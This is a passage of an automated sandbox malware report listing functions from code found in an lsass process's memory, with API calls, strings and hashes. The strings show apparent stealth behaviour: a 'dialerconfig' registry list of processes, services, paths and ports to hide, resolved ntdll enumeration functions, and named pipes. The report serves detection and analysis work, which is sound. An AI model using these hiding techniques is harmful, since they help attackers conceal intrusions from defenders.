Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction ID: 24d8dfdbe4ea57712eab0962e2e093e16a009e3248f80e08512a391ed7392108
Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction Fuzzy Hash: 9A6100327036518FEA68FF25D44876EB391FB84B94F548026DE99077C5EB3AE892D700

Function 00000264CDECAE0C Relevance: 1.3, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapAlloc.KERNEL32 ref: 00000264CDECAE4A

Memory Dump Source

Source File: 0000001C.00000002.3747922298.00000264CDEC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDEC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cdec0000_lsass.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 7fe340314b3ee63b25ee94e81b3b385efda0c5a0b61db0164e6d51f794c8e3ff
Instruction ID: d557785c526f84fd0becd1a54df4c8098c1f657a1dca08e92cca1cbdc4b2149e
Opcode Fuzzy Hash: 7fe340314b3ee63b25ee94e81b3b385efda0c5a0b61db0164e6d51f794c8e3ff
Instruction Fuzzy Hash: 2AF01C71703A5549FA6477B2699D369E1805BC4BE2F484A225DEB863C1DA2AC491C150

Non-executed Functions

Function 00000264CDEC2CDC Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 00000264CDEC2D80
lstrlenW.KERNEL32 ref: 00000264CDEC2FBA

Part of subcall function 00000264CDEC1A14: OpenProcess.KERNEL32 ref: 00000264CDEC1A3A
Part of subcall function 00000264CDEC1A14: K32GetModuleFileNameExW.KERNEL32 ref: 00000264CDEC1A58
Part of subcall function 00000264CDEC1A14: PathFindFileNameW.SHLWAPI ref: 00000264CDEC1A67
Part of subcall function 00000264CDEC1A14: lstrlenW.KERNEL32 ref: 00000264CDEC1A73
Part of subcall function 00000264CDEC1A14: StrCpyW.SHLWAPI ref: 00000264CDEC1A86
Part of subcall function 00000264CDEC1A14: CloseHandle.KERNEL32 ref: 00000264CDEC1A94

GetProcAddress.KERNEL32 ref: 00000264CDEC2D95

Part of subcall function 00000264CDEC1554: StrCmpIW.SHLWAPI ref: 00000264CDEC1585

Part of subcall function 00000264CDEC3930: StrCmpNIW.SHLWAPI ref: 00000264CDEC3948

StrCmpNIW.SHLWAPI ref: 00000264CDEC2DD8
lstrlenW.KERNEL32 ref: 00000264CDEC2F00

Strings

ntdll.dll, xrefs: 00000264CDEC2D79
\Device\Nsi, xrefs: 00000264CDEC2DCB
NtQueryObject, xrefs: 00000264CDEC2D8B

Memory Dump Source

Source File: 0000001C.00000002.3747922298.00000264CDEC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDEC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cdec0000_lsass.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction ID: da1abbe55608dbd53967ffc7cb3bb3bea37ad775823a85f4b5ce3062f4d7798c
Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction Fuzzy Hash: 0DB1BF32212E9486EB65AF25D4487AAF3A5FB84B86F545017EE8A637D4DF37CD80C340

Function 00000264CDEC7E70 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00000264CDEC7E8C
RtlCaptureContext.NTDLL ref: 00000264CDEC7EB9
RtlLookupFunctionEntry.NTDLL ref: 00000264CDEC7ED3
RtlVirtualUnwind.NTDLL ref: 00000264CDEC7F14
IsDebuggerPresent.KERNEL32 ref: 00000264CDEC7F68
SetUnhandledExceptionFilter.KERNEL32 ref: 00000264CDEC7F89
UnhandledExceptionFilter.KERNEL32 ref: 00000264CDEC7F94

Memory Dump Source

Source File: 0000001C.00000002.3747922298.00000264CDEC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDEC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cdec0000_lsass.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction ID: c7ec1f5905627413cc6f1ea4b02ca421ffec06087bbda70e5571b0007c267b76
Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction Fuzzy Hash: 24312D72206F809AEB60AF61E8947EDB364F784745F44442BDA8E47BD9EF39C648C710

Function 00000264CDE67E70 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00000264CDE67E8C
RtlCaptureContext.NTDLL ref: 00000264CDE67EB9
RtlLookupFunctionEntry.NTDLL ref: 00000264CDE67ED3
RtlVirtualUnwind.NTDLL ref: 00000264CDE67F14
IsDebuggerPresent.KERNEL32 ref: 00000264CDE67F68
SetUnhandledExceptionFilter.KERNEL32 ref: 00000264CDE67F89
UnhandledExceptionFilter.KERNEL32 ref: 00000264CDE67F94

Memory Dump Source

Source File: 0000001C.00000002.3746748138.00000264CDE60000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDE60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cde60000_lsass.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction ID: cb9f46236271d821e4a34023b597464573c8270711a1ff2eaff05786d3e9d205
Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction Fuzzy Hash: 15319072206F8096EBA0AF61E8447EDB3A4F794744F44442BDA8D47BD9EF39C549C710

Function 00000264CDECB50C Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 00000264CDECB585
RtlLookupFunctionEntry.NTDLL ref: 00000264CDECB59D
RtlVirtualUnwind.NTDLL ref: 00000264CDECB5D8
IsDebuggerPresent.KERNEL32 ref: 00000264CDECB611
SetUnhandledExceptionFilter.KERNEL32 ref: 00000264CDECB61B
UnhandledExceptionFilter.KERNEL32 ref: 00000264CDECB626

Memory Dump Source

Source File: 0000001C.00000002.3747922298.00000264CDEC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDEC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cdec0000_lsass.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction ID: db34b3d86857f4b8633d3eb2dd46652b86ab1952eee7966eb32a2d3f941168c4
Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction Fuzzy Hash: A5315C36215F8086EB60EF25E8443AEB3A4F788755F500126EADE47BE9EF39C545CB00

Function 00000264CDECFEF8 Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00000264CDECFF67
WriteFile.KERNEL32 ref: 00000264CDED021E
WriteFile.KERNEL32 ref: 00000264CDED0270
GetLastError.KERNEL32 ref: 00000264CDED0372
GetLastError.KERNEL32 ref: 00000264CDED03D2

Memory Dump Source

Source File: 0000001C.00000002.3747922298.00000264CDEC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDEC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cdec0000_lsass.jbxd

Similarity

API ID: ErrorFileLastWrite$ConsoleOutput
String ID:
API String ID: 1443284424-0
Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction ID: 7ee51e1038c3b7af6bb0e30d335ed6e32d8f65d3102a144bf9abeca932909cda
Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction Fuzzy Hash: 47E10132B06E809AE711DF64D4882DDBBB1F385788F184517EE8A57BD9DE3AC51AC700

Function 00000264CDE6FEF8 Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00000264CDE6FF67
WriteFile.KERNEL32 ref: 00000264CDE7021E
WriteFile.KERNEL32 ref: 00000264CDE70270
GetLastError.KERNEL32 ref: 00000264CDE70372
GetLastError.KERNEL32 ref: 00000264CDE703D2

Memory Dump Source

Source File: 0000001C.00000002.3746748138.00000264CDE60000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDE60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cde60000_lsass.jbxd

Similarity

API ID: ErrorFileLastWrite$ConsoleOutput
String ID:
API String ID: 1443284424-0
Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction ID: bb4843a0249a05cd3612e246c417201a226baf8608bc8988653878e7bbe1b0ec
Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction Fuzzy Hash: 53E13F32B0AE809AE751DF64D4882DDBBB1F345788F118107EE8A57BD9DA3AC41AC700

Function 00000264CDEC1650 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00000264CDEC165B
HeapAlloc.KERNEL32 ref: 00000264CDEC166A

Part of subcall function 00000264CDEC1274: GetProcessHeap.KERNEL32 ref: 00000264CDEC127A
Part of subcall function 00000264CDEC1274: HeapAlloc.KERNEL32 ref: 00000264CDEC1289
Part of subcall function 00000264CDEC1274: GetProcessHeap.KERNEL32 ref: 00000264CDEC12A3
Part of subcall function 00000264CDEC1274: HeapAlloc.KERNEL32 ref: 00000264CDEC12B4

RegOpenKeyExW.ADVAPI32 ref: 00000264CDEC16DA
RegOpenKeyExW.ADVAPI32 ref: 00000264CDEC1707
RegCloseKey.ADVAPI32 ref: 00000264CDEC1721
RegOpenKeyExW.ADVAPI32 ref: 00000264CDEC1741
RegCloseKey.ADVAPI32 ref: 00000264CDEC175C
RegOpenKeyExW.ADVAPI32 ref: 00000264CDEC177C
RegCloseKey.ADVAPI32 ref: 00000264CDEC1797
RegOpenKeyExW.ADVAPI32 ref: 00000264CDEC17B7
RegCloseKey.ADVAPI32 ref: 00000264CDEC17D2
RegOpenKeyExW.ADVAPI32 ref: 00000264CDEC17F2
RegCloseKey.ADVAPI32 ref: 00000264CDEC180D
RegOpenKeyExW.ADVAPI32 ref: 00000264CDEC182D
RegCloseKey.ADVAPI32 ref: 00000264CDEC1848
RegOpenKeyExW.ADVAPI32 ref: 00000264CDEC1868
RegCloseKey.ADVAPI32 ref: 00000264CDEC1883
RegOpenKeyExW.ADVAPI32 ref: 00000264CDEC18A3
RegCloseKey.ADVAPI32 ref: 00000264CDEC18BE
RegCloseKey.ADVAPI32 ref: 00000264CDEC18C8

Part of subcall function 00000264CDEC12C8: RegQueryInfoKeyW.ADVAPI32 ref: 00000264CDEC1326
Part of subcall function 00000264CDEC12C8: GetProcessHeap.KERNEL32 ref: 00000264CDEC1334
Part of subcall function 00000264CDEC12C8: HeapAlloc.KERNEL32 ref: 00000264CDEC1345
Part of subcall function 00000264CDEC12C8: RegEnumValueW.ADVAPI32 ref: 00000264CDEC13A1
Part of subcall function 00000264CDEC12C8: GetProcessHeap.KERNEL32 ref: 00000264CDEC13E9
Part of subcall function 00000264CDEC12C8: HeapAlloc.KERNEL32 ref: 00000264CDEC13F7
Part of subcall function 00000264CDEC12C8: GetProcessHeap.KERNEL32 ref: 00000264CDEC141B
Part of subcall function 00000264CDEC12C8: HeapFree.KERNEL32 ref: 00000264CDEC1429
Part of subcall function 00000264CDEC12C8: lstrlenW.KERNEL32 ref: 00000264CDEC1432
Part of subcall function 00000264CDEC12C8: GetProcessHeap.KERNEL32 ref: 00000264CDEC1440
Part of subcall function 00000264CDEC12C8: HeapAlloc.KERNEL32 ref: 00000264CDEC144E

Strings

tcp_local, xrefs: 00000264CDEC1826
pid, xrefs: 00000264CDEC173A
tcp_remote, xrefs: 00000264CDEC1861
process_names, xrefs: 00000264CDEC1775
service_names, xrefs: 00000264CDEC17EB
paths, xrefs: 00000264CDEC17B0
SOFTWARE\dialerconfig, xrefs: 00000264CDEC16BA
udp, xrefs: 00000264CDEC189C
startup, xrefs: 00000264CDEC16FD

Memory Dump Source

Source File: 0000001C.00000002.3747922298.00000264CDEC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDEC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cdec0000_lsass.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 106492572-2879589442
Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction ID: 90e2dff810486e51eb1ca0aaf2e768154dbd3cf1d297165260fa930fae66d33d
Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction Fuzzy Hash: E3711A36312E5085EB20AF65E89879DB7B5FB94B89F005113DE8E47BA8DF3AC544C340

Function 00000264CDE61650 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00000264CDE6165B
HeapAlloc.KERNEL32 ref: 00000264CDE6166A

Part of subcall function 00000264CDE61274: GetProcessHeap.KERNEL32 ref: 00000264CDE6127A
Part of subcall function 00000264CDE61274: HeapAlloc.KERNEL32 ref: 00000264CDE61289
Part of subcall function 00000264CDE61274: GetProcessHeap.KERNEL32 ref: 00000264CDE612A3
Part of subcall function 00000264CDE61274: HeapAlloc.KERNEL32 ref: 00000264CDE612B4

Part of subcall function 00000264CDE61000: GetProcessHeap.KERNEL32 ref: 00000264CDE61006
Part of subcall function 00000264CDE61000: HeapAlloc.KERNEL32 ref: 00000264CDE61015
Part of subcall function 00000264CDE61000: GetProcessHeap.KERNEL32 ref: 00000264CDE61028
Part of subcall function 00000264CDE61000: HeapAlloc.KERNEL32 ref: 00000264CDE61037

RegOpenKeyExW.ADVAPI32 ref: 00000264CDE616DA
RegOpenKeyExW.ADVAPI32 ref: 00000264CDE61707
RegCloseKey.ADVAPI32 ref: 00000264CDE61721
RegOpenKeyExW.ADVAPI32 ref: 00000264CDE61741
RegCloseKey.ADVAPI32 ref: 00000264CDE6175C
RegOpenKeyExW.ADVAPI32 ref: 00000264CDE6177C
RegCloseKey.ADVAPI32 ref: 00000264CDE61797
RegOpenKeyExW.ADVAPI32 ref: 00000264CDE617B7
RegCloseKey.ADVAPI32 ref: 00000264CDE617D2
RegOpenKeyExW.ADVAPI32 ref: 00000264CDE617F2
RegCloseKey.ADVAPI32 ref: 00000264CDE6180D
RegOpenKeyExW.ADVAPI32 ref: 00000264CDE6182D
RegCloseKey.ADVAPI32 ref: 00000264CDE61848
RegOpenKeyExW.ADVAPI32 ref: 00000264CDE61868
RegCloseKey.ADVAPI32 ref: 00000264CDE61883
RegOpenKeyExW.ADVAPI32 ref: 00000264CDE618A3
RegCloseKey.ADVAPI32 ref: 00000264CDE618BE
RegCloseKey.ADVAPI32 ref: 00000264CDE618C8

Part of subcall function 00000264CDE612C8: RegQueryInfoKeyW.ADVAPI32 ref: 00000264CDE61326
Part of subcall function 00000264CDE612C8: GetProcessHeap.KERNEL32 ref: 00000264CDE61334
Part of subcall function 00000264CDE612C8: HeapAlloc.KERNEL32 ref: 00000264CDE61345
Part of subcall function 00000264CDE612C8: RegEnumValueW.ADVAPI32 ref: 00000264CDE613A1
Part of subcall function 00000264CDE612C8: GetProcessHeap.KERNEL32 ref: 00000264CDE613E9
Part of subcall function 00000264CDE612C8: HeapAlloc.KERNEL32 ref: 00000264CDE613F7
Part of subcall function 00000264CDE612C8: GetProcessHeap.KERNEL32 ref: 00000264CDE6141B
Part of subcall function 00000264CDE612C8: HeapFree.KERNEL32 ref: 00000264CDE61429
Part of subcall function 00000264CDE612C8: lstrlenW.KERNEL32 ref: 00000264CDE61432
Part of subcall function 00000264CDE612C8: GetProcessHeap.KERNEL32 ref: 00000264CDE61440
Part of subcall function 00000264CDE612C8: HeapAlloc.KERNEL32 ref: 00000264CDE6144E

Strings

service_names, xrefs: 00000264CDE617EB
udp, xrefs: 00000264CDE6189C
paths, xrefs: 00000264CDE617B0
SOFTWARE\dialerconfig, xrefs: 00000264CDE616BA
process_names, xrefs: 00000264CDE61775
startup, xrefs: 00000264CDE616FD
tcp_local, xrefs: 00000264CDE61826
pid, xrefs: 00000264CDE6173A
tcp_remote, xrefs: 00000264CDE61861

Memory Dump Source

Source File: 0000001C.00000002.3746748138.00000264CDE60000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDE60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cde60000_lsass.jbxd

Similarity

API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 2135414181-2879589442
Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction ID: f74f72fd46bda5fd879ac8e0e9e0f3f383aa4fa0a1a3d4d3aadab18e5cf5748e
Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction Fuzzy Hash: 68711D36312E5485EB90AF65EC9869DB7B5F794B88F011113DE8D87BA8DF3AC485C300

Function 00000264CDEC12C8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000264CDEC1326
GetProcessHeap.KERNEL32 ref: 00000264CDEC1334
HeapAlloc.KERNEL32 ref: 00000264CDEC1345
RegEnumValueW.ADVAPI32 ref: 00000264CDEC13A1

Part of subcall function 00000264CDEC1554: StrCmpIW.SHLWAPI ref: 00000264CDEC1585

GetProcessHeap.KERNEL32 ref: 00000264CDEC13E9
HeapAlloc.KERNEL32 ref: 00000264CDEC13F7
GetProcessHeap.KERNEL32 ref: 00000264CDEC141B
HeapFree.KERNEL32 ref: 00000264CDEC1429
lstrlenW.KERNEL32 ref: 00000264CDEC1432
GetProcessHeap.KERNEL32 ref: 00000264CDEC1440
HeapAlloc.KERNEL32 ref: 00000264CDEC144E
StrCpyW.SHLWAPI ref: 00000264CDEC1470
GetProcessHeap.KERNEL32 ref: 00000264CDEC1485
HeapFree.KERNEL32 ref: 00000264CDEC1493

Strings

d, xrefs: 00000264CDEC1365

Memory Dump Source

Source File: 0000001C.00000002.3747922298.00000264CDEC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDEC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cdec0000_lsass.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction ID: e5c567051f5ce0286727a34ecf1e658574aa5aef4581ba1481248624c0a63bbf
Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction Fuzzy Hash: 3F518E72215F45D3EB14EF62E54839AB3A1F789B85F048126DB8A47B98DF3DC056CB40

Function 00000264CDE612C8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000264CDE61326
GetProcessHeap.KERNEL32 ref: 00000264CDE61334
HeapAlloc.KERNEL32 ref: 00000264CDE61345
RegEnumValueW.ADVAPI32 ref: 00000264CDE613A1

Part of subcall function 00000264CDE61554: StrCmpIW.SHLWAPI ref: 00000264CDE61585

GetProcessHeap.KERNEL32 ref: 00000264CDE613E9
HeapAlloc.KERNEL32 ref: 00000264CDE613F7
GetProcessHeap.KERNEL32 ref: 00000264CDE6141B
HeapFree.KERNEL32 ref: 00000264CDE61429
lstrlenW.KERNEL32 ref: 00000264CDE61432
GetProcessHeap.KERNEL32 ref: 00000264CDE61440
HeapAlloc.KERNEL32 ref: 00000264CDE6144E
StrCpyW.SHLWAPI ref: 00000264CDE61470
GetProcessHeap.KERNEL32 ref: 00000264CDE61485
HeapFree.KERNEL32 ref: 00000264CDE61493

Strings

d, xrefs: 00000264CDE61365

Memory Dump Source

Source File: 0000001C.00000002.3746748138.00000264CDE60000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDE60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cde60000_lsass.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction ID: 622bde93821ea732e740621dc5badfddc38cd8062f79fb10a56246d501ea83c4
Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction Fuzzy Hash: 88519172205F44D3EB94EF62E94839AB7A1F799B80F058126DB9907B98DF39C096C700

Function 00000264CDEC1EB4 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00000264CDEC1EBF

Part of subcall function 00000264CDEC2174: GetModuleHandleA.KERNEL32 ref: 00000264CDEC218C
Part of subcall function 00000264CDEC2174: GetProcAddress.KERNEL32 ref: 00000264CDEC219D

Part of subcall function 00000264CDEC5C10: GetCurrentThreadId.KERNEL32 ref: 00000264CDEC5C4B

Strings

NtQueryDirectoryFileEx, xrefs: 00000264CDEC1F3C
ntdll.dll, xrefs: 00000264CDEC1ECD
NtResumeThread, xrefs: 00000264CDEC1F02
NtEnumerateValueKey, xrefs: 00000264CDEC1F76
EnumServiceGroupW, xrefs: 00000264CDEC1F90
NtEnumerateKey, xrefs: 00000264CDEC1F59
NtQuerySystemInformation, xrefs: 00000264CDEC1EE5
NtDeviceIoControlFile, xrefs: 00000264CDEC1FF6
NtQueryDirectoryFile, xrefs: 00000264CDEC1F1F
EnumServicesStatusExW, xrefs: 00000264CDEC1FB1, 00000264CDEC1FD2
sechost.dll, xrefs: 00000264CDEC1FD9
advapi32.dll, xrefs: 00000264CDEC1F97, 00000264CDEC1FB8

Memory Dump Source

Source File: 0000001C.00000002.3747922298.00000264CDEC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDEC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cdec0000_lsass.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction ID: a2d9f5ffb21beea3cfaedacd9253b29f8d7a0b998a2a978dbf08010a9062d069
Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction Fuzzy Hash: D331A070203E5AA0EB04FFA5E89E6D5B321B794B45F805523A5DA123E69E7BC249C380

Function 00000264CDE61EB4 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 00000264CDE61EBF

Part of subcall function 00000264CDE62174: GetModuleHandleA.KERNEL32 ref: 00000264CDE6218C
Part of subcall function 00000264CDE62174: GetProcAddress.KERNEL32 ref: 00000264CDE6219D

Part of subcall function 00000264CDE65C10: GetCurrentThreadId.KERNEL32 ref: 00000264CDE65C4B

Strings

advapi32.dll, xrefs: 00000264CDE61F97, 00000264CDE61FB8
NtEnumerateValueKey, xrefs: 00000264CDE61F76
NtQueryDirectoryFileEx, xrefs: 00000264CDE61F3C
EnumServiceGroupW, xrefs: 00000264CDE61F90
NtEnumerateKey, xrefs: 00000264CDE61F59
NtQuerySystemInformation, xrefs: 00000264CDE61EE5
NtQueryDirectoryFile, xrefs: 00000264CDE61F1F
sechost.dll, xrefs: 00000264CDE61FD9
ntdll.dll, xrefs: 00000264CDE61ECD
NtDeviceIoControlFile, xrefs: 00000264CDE61FF6
NtResumeThread, xrefs: 00000264CDE61F02
EnumServicesStatusExW, xrefs: 00000264CDE61FB1, 00000264CDE61FD2

Memory Dump Source

Source File: 0000001C.00000002.3746748138.00000264CDE60000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDE60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cde60000_lsass.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction ID: 86c65fe673252a8210649364449fbe500f300b315d82c22b37e3c0a4fc994e0f
Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction Fuzzy Hash: F931C274603E4AA0FB84FF64EC996D5A321B764744F825423D59D563E69E3BC24AC380

Function 00000264CDEC23F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON

Download Yara Rule

APIs

GetProcessIdOfThread.KERNEL32 ref: 00000264CDEC2405
GetCurrentProcessId.KERNEL32 ref: 00000264CDEC240F

Part of subcall function 00000264CDEC19AC: OpenProcess.KERNEL32 ref: 00000264CDEC19CA
Part of subcall function 00000264CDEC19AC: IsWow64Process.KERNEL32 ref: 00000264CDEC19E0
Part of subcall function 00000264CDEC19AC: CloseHandle.KERNEL32 ref: 00000264CDEC19FB

CreateFileW.KERNEL32 ref: 00000264CDEC2468
WriteFile.KERNEL32 ref: 00000264CDEC2490
ReadFile.KERNEL32 ref: 00000264CDEC24AF
CloseHandle.KERNEL32 ref: 00000264CDEC24B8

Strings

\\.\pipe\dialerchildproc32, xrefs: 00000264CDEC243F
\\.\pipe\dialerchildproc64, xrefs: 00000264CDEC2438

Memory Dump Source

Source File: 0000001C.00000002.3747922298.00000264CDEC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDEC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cdec0000_lsass.jbxd

Similarity

API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2171963597-1373409510
Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction ID: 0fc5a060898512e74565f5abe6d224ee60ba046f5473500d8d0a588f5c1c7e33
Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction Fuzzy Hash: ED214936615F4083FB10AB25F54875AB3A0F389BA5F544216EA9A42BE8CF3EC149CB00

Function 00000264CDEC104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000264CDEC10AB
RegEnumValueW.ADVAPI32 ref: 00000264CDEC110E
GetProcessHeap.KERNEL32 ref: 00000264CDEC1155
HeapAlloc.KERNEL32 ref: 00000264CDEC1163
GetProcessHeap.KERNEL32 ref: 00000264CDEC1187
HeapFree.KERNEL32 ref: 00000264CDEC1195

Strings

d, xrefs: 00000264CDEC10CE

Memory Dump Source

